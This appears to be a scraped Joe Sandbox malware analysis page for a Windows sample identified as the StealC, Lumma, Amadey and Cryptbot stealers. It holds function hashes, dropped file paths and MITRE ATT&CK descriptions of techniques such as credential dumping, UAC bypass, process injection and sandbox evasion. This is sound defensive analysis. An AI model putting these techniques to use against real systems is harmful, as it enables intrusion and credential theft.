Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
Instruction ID: d5ab4806ffe72a1369b891b0c03ce99b48dccca7df38fd9f7e726c1ee5c76a78
Opcode Fuzzy Hash: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
Instruction Fuzzy Hash: 250124347A0A01DBE7258B15A891BB37293FB82310FA49029E18293281DB69AC91875D

Function 004345F0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: fc3937f92bddd9b9036211213233e27d23e83f380f16c5f831fb688d5273015d
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 8E11EC336051D40EC3158D3C84005A5BF930AD7234F59939AF4B4972E6D62A9D8B8359

Function 0042A060 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
Instruction ID: 81ebb7552e56e7d5adf40a514b1d7c04d719dbb311c9cbdb1d4034df3b6f2776
Opcode Fuzzy Hash: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
Instruction Fuzzy Hash: D601D4F5B00B1147D7309E11A5C0B27B2A9AF8070CF59443EED4467342DB7EEC28C69A

Function 00430A6C Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5edfeaaa6d403e8ef5147276fc98aea11c6f20c8930d55cc66b8c43186eff2a3
Instruction ID: 7f1b5fbc4c8fd8bdc68119b10335f3dece141e9bb0e85f0d5af8bf7bebd0fb1e
Opcode Fuzzy Hash: 5edfeaaa6d403e8ef5147276fc98aea11c6f20c8930d55cc66b8c43186eff2a3
Instruction Fuzzy Hash: 53011AF05202006EE714FB3CCD0AA377AECD745204F41465CBC65DB2D5E274A8188BA6

Function 00402B70 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
Instruction ID: dad6f7438d27f99e102fe50886f5565f1d4720bfb2582f27d129ae765fd9d515
Opcode Fuzzy Hash: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
Instruction Fuzzy Hash: EEF0E937B1551607A214DD26ACC453BB366D7C6314B295439E841E3281C979F80692B8

Function 0042B475 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
Instruction ID: c74ae76d4aeefb6f888da0d67bba939e79ddb671e6929748130615be24dd088f
Opcode Fuzzy Hash: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
Instruction Fuzzy Hash: E6D022789048005BC608EB10EE12639B2688F4B2AEF00303DE443FF353CE38EC60890E

Function 0040C274 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
Instruction ID: 52fe0259059b82c7cb9fb3d0f913ef24527c2e8030ec2916e1bb67edfa7a0227
Opcode Fuzzy Hash: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
Instruction Fuzzy Hash: 01D0122494A2994AD3068F389CA1731BBB1EF03100F442558D142DB291C7D09016865C

Function 00427546 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(00000000,?,00000000), ref: 00427607

Strings

JC, xrefs: 00427592
B\, xrefs: 0042759A
OR, xrefs: 0042758A
<vB, xrefs: 00427636

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: CopyFile
String ID: <vB$B\$JC$OR
API String ID: 1304948518-1094185596
Opcode ID: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
Instruction ID: 8ef9865115e3bd1ef4dc2c2120f56385b28599b8e62f1996c0c1473ca8bdbd32
Opcode Fuzzy Hash: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
Instruction Fuzzy Hash: 802180B964D340DFD3209F61A84671BBBF4FB86304F40582CE1D587291EB788515DB4A

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Threatname: Cryptbot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\2D2DBIWLXBIE\KFCJW4

C:\ProgramData\2D2DBIWLXBIE\YCB1NO (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

Windows Analysis Report
file.exe

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre